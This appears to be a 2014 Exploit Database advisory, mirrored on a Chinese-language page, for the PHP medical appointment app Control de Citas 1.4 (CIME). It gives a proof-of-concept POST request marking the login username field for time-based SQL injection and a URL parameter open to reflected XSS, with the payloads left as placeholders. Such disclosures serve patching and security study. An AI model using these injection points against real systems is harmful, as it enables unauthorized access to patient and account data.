CiMe Citas Médicas – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： vinicius777
  日期： 2014-02-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31350/

• # Exploit Title: Control de Citas 1.4 (CIME) - Multiple Vulnerabilities
  # Date: 01/02/2014
  # Exploit Author: vinicius777
  # Contact: vinicius777 [AT] gmail / @vinicius777_
  # Vendor Homepage: http://www.cgaredes.tk/
  # Software Link: http://sourceforge.net/projects/cime/files/latest/download?source=directory
  
   
  [1] SQL Injection - 'USERNAME' vulnerable to time based attack
  
  P0C: POST REQUEST 
  
  POST /cime/citasmedicas.php?pag=citasmedindex HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/cime/citasmedicas.php?pag=citasmedindex
  Cookie: PHPSESSID=ftkms6mdqi3039r41felgm39s1; 
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 27
  
  username=[SQL INJECTION]&password=pass
  
  
  [2] XSS Reflected on citasmedicas.php (must be logged)
  
  P0C = http://localhost/cime/citasmedicas.php?pag=[XSS]
  
  
  
  ##